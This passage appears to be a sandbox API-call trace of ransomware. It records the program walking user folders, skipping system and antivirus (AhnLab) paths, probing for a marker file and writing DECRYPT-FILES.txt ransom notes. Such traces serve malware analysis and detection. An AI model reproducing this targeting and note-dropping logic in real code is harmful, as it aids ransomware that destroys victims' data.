lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0186.569] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0186.569] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0186.569] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0186.570] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.570] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0186.570] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.570] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Cookies\\\\0a16c9.tmp") returned 36 [0186.570] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\cookies\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.570] GetLastError () returned 0x5 [0186.570] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0186.570] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.570] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Cookies\\\\DECRYPT-FILES.txt") returned 43 [0186.570] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.570] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0186.570] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Cookies\\*") returned="C:\\Users\\Default\\Cookies\\*" [0186.570] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.570] CloseHandle (hObject=0xffffffff) returned 0 [0186.570] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.570] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.571] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0186.571] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0186.571] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0186.571] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0186.571] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\Program Files") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0186.571] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.571] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0186.571] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.571] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Desktop\\\\0a16c9.tmp") returned 36 [0186.571] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\desktop\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.571] GetLastError () returned 0x5 [0186.571] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0186.571] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.571] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Desktop\\\\DECRYPT-FILES.txt") returned 43 [0186.571] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.572] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0186.572] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0186.572] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.572] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.572] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.572] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.572] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.572] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.572] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.572] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.572] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.572] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.572] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.572] CloseHandle (hObject=0xffffffff) returned 0 [0186.572] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0186.572] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0186.572] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0186.572] lstrcatW (in: lpString1="Documents", lpString2="\\" | out: lpString1="Documents\\") returned="Documents\\" [0186.572] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\Program Files") returned 0x0 [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch=":\\Windows") returned 0x0 [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\Games\\") returned 0x0 [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.572] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\All Users") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="AhnLab") returned 0x0 [0186.573] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.573] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0186.573] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.573] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\\\0a16c9.tmp") returned 38 [0186.573] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\documents\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.578] GetLastError () returned 0x5 [0186.578] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0186.578] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.578] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\\\DECRYPT-FILES.txt") returned 45 [0186.578] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.580] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0186.580] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0186.580] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.580] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.580] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.580] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.580] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.580] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.580] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.580] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.581] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.581] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.581] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.581] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.581] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0186.581] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0186.581] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0186.581] lstrcatW (in: lpString1="My Music", lpString2="\\" | out: lpString1="My Music\\") returned="My Music\\" [0186.581] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\Program Files") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch=":\\Windows") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\Games\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\All Users") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="AhnLab") returned 0x0 [0186.581] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.581] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0186.581] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.581] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\0a16c9.tmp") returned 47 [0186.581] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\documents\\my music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.582] GetLastError () returned 0x5 [0186.582] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0186.582] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.582] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 54 [0186.582] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.582] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0186.582] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*") returned="C:\\Users\\Default\\Documents\\My Music\\*" [0186.582] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.582] CloseHandle (hObject=0xffffffff) returned 0 [0186.582] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0186.583] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0186.583] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0186.583] lstrcatW (in: lpString1="My Pictures", lpString2="\\" | out: lpString1="My Pictures\\") returned="My Pictures\\" [0186.583] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.583] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.583] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0186.583] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.583] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\0a16c9.tmp") returned 50 [0186.583] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\documents\\my pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 